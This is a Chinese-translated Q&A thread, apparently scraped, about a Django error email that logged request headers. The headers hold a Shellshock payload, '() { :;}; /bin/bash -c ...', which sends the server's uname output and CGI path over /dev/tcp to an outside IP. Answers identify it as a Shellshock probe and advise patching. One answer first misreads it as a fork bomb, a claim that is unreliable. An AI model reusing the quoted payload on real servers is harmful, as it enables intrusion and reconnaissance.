我已经设置django通过电子邮件提醒我,当任何请求失败,我不断收到这封电子邮件:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unkNown_ip>>/21; /bin/uname -a > /dev/tcp/<<unkNown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unkNown_ip>>/21" Requested URL: /cgi-bin/index.cgi User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unkNown_ip>>/21; /bin/uname -a > /dev/tcp/<<unkNown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unkNown_ip>>/21" IP address: 127.0.0.1
这是什么意思? 我应该打扰吗?
我正在使用Nginx,ubuntu,gunicorn。
在Unix或Gnu / Linux上减less进程的权限
如何计算一个进程的最小能力集?
无论如何,使Rails / Rack应用程序告诉Web服务器放弃连接
用Git存储密码有多安全?
安全地存储凭据,当我需要检索密码使用
PerlencryptionSTDIN密码
如何防止使用.htaccess或自定义PHP.ini来覆盖设置
如何从Powershell设置Windows服务权限?
这看起来像一个尝试的叉炸弹 :
() { :;};
幸运的是,如果您的服务器在发送之后仍在运行,则意味着它正在被清理或忽略。
正如@TheGreatContini指出,这实际上是一个企图Shellshock攻击 。 这使我的答案有点不安全。 它的价值在于确保您的服务器已完全打上补丁并保持最新状态,并检查所有传出流量以确保您没有受到影响。
这是一个尝试利用壳震动的弱点。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
